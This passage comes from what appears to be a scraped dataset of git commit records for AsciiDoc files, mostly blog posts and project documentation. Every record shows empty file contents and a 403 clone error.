2016-07-08-Configuring-Spinnaker-authentication-using-Git-Hub-O-Ath.adoc","repos":"gbougeard\/blog.english,gbougeard\/blog.english,gbougeard\/blog.english,gbougeard\/blog.english","old_file":"_posts\/2016-07-08-Configuring-Spinnaker-authentication-using-Git-Hub-O-Ath.adoc","new_file":"_posts\/2016-07-08-Configuring-Spinnaker-authentication-using-Git-Hub-O-Ath.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gbougeard\/blog.english.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a67689f8b82ba2ccafe9a64a9d736228d9eba660","subject":"Update 2016-07-22-Improving-performance-with-simple-compression.adoc","message":"Update 2016-07-22-Improving-performance-with-simple-compression.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-07-22-Improving-performance-with-simple-compression.adoc","new_file":"_posts\/2016-07-22-Improving-performance-with-simple-compression.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83fc4ec2e5d143a33946788229b9ecde1b5047f8","subject":"zsh: Add a section that explains `envsecrets.zsh`","message":"zsh: Add a section that explains `envsecrets.zsh`\n\nKeeping the secrets in envsecrets.zsh is quite simple, however the\ncurrent setup of the configuration requires a little bit of manual help\nif one wants the most ease of use.\n\nThis section explains how to change `envsecrets.zsh`'s file permissions\nand how to avoid tracking it with git.\n","repos":"PigeonF\/.dotfiles","old_file":"zsh\/README.adoc","new_file":"zsh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfe8b8745e879a35b7705b879c6877d03422dd64","subject":"- Updated doc on mcast","message":"- Updated doc on mcast\n","repos":"pruivo\/JGroups,ibrahimshbat\/JGroups,belaban\/JGroups,pferraro\/JGroups,ibrahimshbat\/JGroups,pruivo\/JGroups,TarantulaTechnology\/JGroups,ibrahimshbat\/JGroups,ligzy\/JGroups,pferraro\/JGroups,dimbleby\/JGroups,kedzie\/JGroups,rpelisse\/JGroups,slaskawi\/JGroups,kedzie\/JGroups,pruivo\/JGroups,vjuranek\/JGroups,vjuranek\/JGroups,ligzy\/JGroups,rpelisse\/JGroups,Sanne\/JGroups,belaban\/JGroups,TarantulaTechnology\/JGroups,TarantulaTechnology\/JGroups,rhusar\/JGroups,danberindei\/JGroups,Sanne\/JGroups,kedzie\/JGroups,slaskawi\/JGroups,vjuranek\/JGroups,Sanne\/JGroups,dimbleby\/JGroups,ibrahimshbat\/JGroups,pferraro\/JGroups,deepnarsay\/JGroups,belaban\/JGroups,dimbleby\/JGroups,deepnarsay\/JGroups,deepnarsay\/JGroups,rhusar\/JGroups,rhusar\/JGroups,danberindei\/JGroups,slaskawi\/JGroups,ligzy\/JGroups,rpelisse\/JGroups,danberindei\/JGroups","old_file":"doc\/manual\/installation.adoc","new_file":"doc\/manual\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ibrahimshbat\/JGroups.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af090b5616b718dcd964a50b480d7ffe2227fa61","subject":"Update 2016-08-31-Title.adoc","message":"Update 2016-08-31-Title.adoc","repos":"crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io","old_file":"_posts\/2016-08-31-Title.adoc","new_file":"_posts\/2016-08-31-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crisgoncalves\/crisgoncalves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08b39d3a846a7b725c10ce8f7dfaaed5c4ce852e","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ab1789f389d2bf42df9c0d7ede28d029f5bf50e","subject":"Update 2017-07-21-Todos.adoc","message":"Update 2017-07-21-Todos.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-21-Todos.adoc","new_file":"_posts\/2017-07-21-Todos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"178843cd44f38c40e6832db97ddd00dc0c233ae0","subject":"y2b create post Does The Galaxy S8 Have A Serious Screen Problem?","message":"y2b create post Does The Galaxy S8 Have A Serious Screen Problem?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-22-Does-The-Galaxy-S8-Have-A-Serious-Screen-Problem.adoc","new_file":"_posts\/2017-04-22-Does-The-Galaxy-S8-Have-A-Serious-Screen-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f19a933225adb880631a989bf27cdb62ea460bc","subject":"Update 2013-02-22-Eclipse-Les-raccourcis-claviers-utiles.adoc","message":"Update 2013-02-22-Eclipse-Les-raccourcis-claviers-utiles.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-02-22-Eclipse-Les-raccourcis-claviers-utiles.adoc","new_file":"_posts\/2013-02-22-Eclipse-Les-raccourcis-claviers-utiles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b5d70b2bf71e4e66b9872aaec5e6c21e89333d9","subject":"Update 2017-02-08-Automatic-turn-onoff-power-to-receiver.adoc","message":"Update 2017-02-08-Automatic-turn-onoff-power-to-receiver.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-02-08-Automatic-turn-onoff-power-to-receiver.adoc","new_file":"_posts\/2017-02-08-Automatic-turn-onoff-power-to-receiver.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"023da1baf62b97c0cc5eb73f6a13405840ea4f57","subject":"y2b create post The Ultimate Workstation PC Project","message":"y2b create post The Ultimate Workstation PC Project","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-07-The-Ultimate-Workstation-PC-Project.adoc","new_file":"_posts\/2013-05-07-The-Ultimate-Workstation-PC-Project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbb468b25af96b832d2d6c3401388e3a95bcef5f","subject":"y2b create post Unboxing Preview \\\/ Any gamers in the crowd?","message":"y2b create post Unboxing Preview \\\/ Any gamers in the crowd?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-07-Unboxing-Preview--Any-gamers-in-the-crowd.adoc","new_file":"_posts\/2011-12-07-Unboxing-Preview--Any-gamers-in-the-crowd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9afe25736acdac8e6256d43ce15985997edc71d2","subject":"Renamed '_posts\/2016-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc' to '_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc'","message":"Renamed '_posts\/2016-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc' to '_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc'","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc","new_file":"_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"370be02766f004c819b2e37fbb74c8734c184a71","subject":"Update 2016-12-08-Post-1.adoc","message":"Update 2016-12-08-Post-1.adoc","repos":"jlmcgehee21\/nooganeer,jlmcgehee21\/nooganeer,jlmcgehee21\/nooganeer,jlmcgehee21\/nooganeer","old_file":"_posts\/2016-12-08-Post-1.adoc","new_file":"_posts\/2016-12-08-Post-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jlmcgehee21\/nooganeer.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d675277728ed077c38aa607bff3957b452045a54","subject":"Update 2016-6-29-PHP-CSV.adoc","message":"Update 2016-6-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a77207f05d55e075724a1ca4532c21b08c17793b","subject":"Update 2018-08-06-Python.adoc","message":"Update 2018-08-06-Python.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-06-Python.adoc","new_file":"_posts\/2018-08-06-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51218713a1084c9e6d50e2a93bd79f81a4a9aea0","subject":"[docs] Document how to recover from a majority failed tablet","message":"[docs] Document how to recover from a majority failed tablet\n\nThis adds some docs on how to recover when a tablet can no longer find\na majority due to the permanent failure of replicas.\n\nI tested this procedure by failing tablets in various ways:\n- deleting important bits like cmeta or tablet metadata\n- deleting entire data dirs\n- tombstoning 2\/3 replicas (and disabling tombstoned voting)\nand I was always able to recover using these instructions.\n\nChange-Id: Ic6326f65d029a1cd75e487b16ce5be4baea2f215\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8402\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"452fbb6bdf42c29549194f96f6419c38e6516121","subject":"High-level documentation","message":"High-level documentation","repos":"kovaloid\/infoarchive-sip-sdk,Enterprise-Content-Management\/infoarchive-sip-sdk","old_file":"configuration\/README.adoc","new_file":"configuration\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Enterprise-Content-Management\/infoarchive-sip-sdk.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"b10a69959bae67206e02f1947773d1ab907910d3","subject":"Update 2012-01-23-Couverture-des-tests-dintegration-avec-JaCo-Co-Maven-et-Sonar.adoc","message":"Update 2012-01-23-Couverture-des-tests-dintegration-avec-JaCo-Co-Maven-et-Sonar.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2012-01-23-Couverture-des-tests-dintegration-avec-JaCo-Co-Maven-et-Sonar.adoc","new_file":"_posts\/2012-01-23-Couverture-des-tests-dintegration-avec-JaCo-Co-Maven-et-Sonar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1f7c8db631829f46ee29b08e6f86e017eecbbda","subject":"Submitting updated version of the quick start guide","message":"Submitting updated version of the quick start guide\n\nMaking the quick start guide more descriptive","repos":"RestComm\/documentation,RestComm\/documentation","old_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RestComm\/documentation.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"cb8c7b8e96afc3687d2f685eee6c37ea32323ac2","subject":"Update 2016-12-14-Testing-database-changes-using-Liquibase-in-continous-delivery.adoc","message":"Update 2016-12-14-Testing-database-changes-using-Liquibase-in-continous-delivery.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-12-14-Testing-database-changes-using-Liquibase-in-continous-delivery.adoc","new_file":"_posts\/2016-12-14-Testing-database-changes-using-Liquibase-in-continous-delivery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"216d8503fac3d9ca266073390ad0e309c12e11aa","subject":"Update 2015-11-05-improve-your-java-environment-with-docker.adoc","message":"Update 2015-11-05-improve-your-java-environment-with-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-11-05-improve-your-java-environment-with-docker.adoc","new_file":"_posts\/2015-11-05-improve-your-java-environment-with-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45362426bc44f675642455dedf80130885c2571f","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e7ee4f0752f2c2984ce677002010878b7c03f1f","subject":"Update 2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","message":"Update 2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","new_file":"_posts\/2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5ccf48fc48011d37fe9afc9f6e87e9ddbe11891","subject":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","message":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05d07cf411005f5a2e147b490fd5fdd214ec391e","subject":"y2b create post MacBook Air Unboxing (13-inch MacBook Air 2013 Unboxing - Haswell)","message":"y2b create post MacBook Air Unboxing (13-inch MacBook Air 2013 Unboxing - Haswell)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-16-MacBook-Air-Unboxing-13inch-MacBook-Air-2013-Unboxing--Haswell.adoc","new_file":"_posts\/2013-06-16-MacBook-Air-Unboxing-13inch-MacBook-Air-2013-Unboxing--Haswell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3cb14cb6d0d818b73e8fab70eda7f17e4405ba0","subject":"Update 2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","message":"Update 2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","new_file":"_posts\/2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2603e9b9d00ac10cf75337ab270a35fa638eac1","subject":"Update 2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","message":"Update 2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","new_file":"_posts\/2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fb957a5d3b465ba08b0691d26e7bcc89776bada","subject":"Update 2020-05-14-Elastic-delete-document-by-timestamp.adoc","message":"Update 2020-05-14-Elastic-delete-document-by-timestamp.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2020-05-14-Elastic-delete-document-by-timestamp.adoc","new_file":"_posts\/2020-05-14-Elastic-delete-document-by-timestamp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a925b158b40bc644e470fa2ece388bc771c59da5","subject":"Update 2017-06-14-Red-Hat-Tech-Day-Demo-Recordings-June-2017.adoc","message":"Update 2017-06-14-Red-Hat-Tech-Day-Demo-Recordings-June-2017.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-06-14-Red-Hat-Tech-Day-Demo-Recordings-June-2017.adoc","new_file":"_posts\/2017-06-14-Red-Hat-Tech-Day-Demo-Recordings-June-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5b45a518ee62a30a9e3871011ab4b03e6850f63","subject":"Update 2010-11-29-0755-Afficher-les-videos-de-Parleys-dans-Confluence.adoc","message":"Update 2010-11-29-0755-Afficher-les-videos-de-Parleys-dans-Confluence.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-11-29-0755-Afficher-les-videos-de-Parleys-dans-Confluence.adoc","new_file":"_posts\/2010-11-29-0755-Afficher-les-videos-de-Parleys-dans-Confluence.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"562e9df7c0157620e13b8771238be2d6bcfd88b7","subject":"Add readme","message":"Add readme\n","repos":"10sr\/server-provisions,10sr\/machine-setups,10sr\/machine-setups,10sr\/machine-setups,10sr\/server-provisions,10sr\/machine-setups","old_file":"conoha\/roles\/ddns\/README.adoc","new_file":"conoha\/roles\/ddns\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/10sr\/machine-setups.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"d4f11a5cb99da8d7c50d0c1bf719b0bf6d19951a","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"430fed8136a12035e860fc2a3f8ff4aa0134e478","subject":"Publish 2016-7-8.adoc","message":"Publish 2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-8.adoc","new_file":"2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b17e7811f5ca877ab538c34dfc9b0f98424b1ef","subject":"Add changes file.","message":"Add changes file.\n","repos":"shrayasr\/buddy-auth,rwilson\/buddy-auth,funcool\/buddy-auth,jgregors\/buddy-auth","old_file":"CHANGES.adoc","new_file":"CHANGES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shrayasr\/buddy-auth.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a921e879df9b37f0a5177ca7dab61b4d3c211520","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f10e5ea0689a6e79e003d473e758453897e1d66","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf059378d1432fc1ec83317f8e0313e60c55e874","subject":"Docs: Updated stop token filter docs","message":"Docs: Updated stop token filter docs\n","repos":"elancom\/elasticsearch,sarwarbhuiyan\/elasticsearch,rento19962\/elasticsearch,diendt\/elasticsearch,markharwood\/elasticsearch,hanst\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jprante\/elasticsearch,Fsero\/elasticsearch,loconsolutions\/elasticsearch,chirilo\/elasticsearch,sauravmondallive\/elasticsearch,kaneshin\/elasticsearch,strapdata\/elassandra-test,ThalaivaStars\/OrgRepo1,himanshuag\/elasticsearch,Ansh90\/elasticsearch,brandonkearby\/elasticsearch,kevinkluge\/elasticsearch,bawse\/elasticsearch,golubev\/elasticsearch,masaruh\/elasticsearch,StefanGor\/elasticsearch,hanst\/elasticsearch,knight1128\/elasticsearch,jimhooker2002\/elasticsearch,palecur\/elasticsearch,henakamaMSFT\/elasticsearch,slavau\/elasticsearch,C-Bish\/elasticsearch,Kakakakakku\/elasticsearch,jimhooker2002\/elasticsearch,hydro2k\/elasticsearch,Asimov4\/elasticsearch,MetSystem\/elasticsearch,hechunwen\/elasticsearch,Brijeshrpatel9\/elasticsearch,sjohnr\/elasticsearch,alexkuk\/elasticsearch,andrejserafim\/elasticsearch,Shekharrajak\/elasticsearch,AndreKR\/elasticsearch,PhaedrusTheGreek\/elasticsearch,xingguang2013\/elasticsearch,xingguang2013\/elasticsearch,andrestc\/elasticsearch,yuy168\/elasticsearch,humandb\/elasticsearch,avikurapati\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Widen\/elasticsearch,YosuaMichael\/elasticsearch,sscarduzio\/elasticsearch,truemped\/elasticsearch,onegambler\/elasticsearch,overcome\/elasticsearch,hirdesh2008\/elasticsearch,mute\/elasticsearch,fforbeck\/elasticsearch,tkssharma\/elasticsearch,schonfeld\/elasticsearch,hechunwen\/elasticsearch,hechunwen\/elasticsearch,abhijitiitr\/es,xpandan\/elasticsearch,GlenRSmith\/elasticsearch,springning\/elasticsearch,henak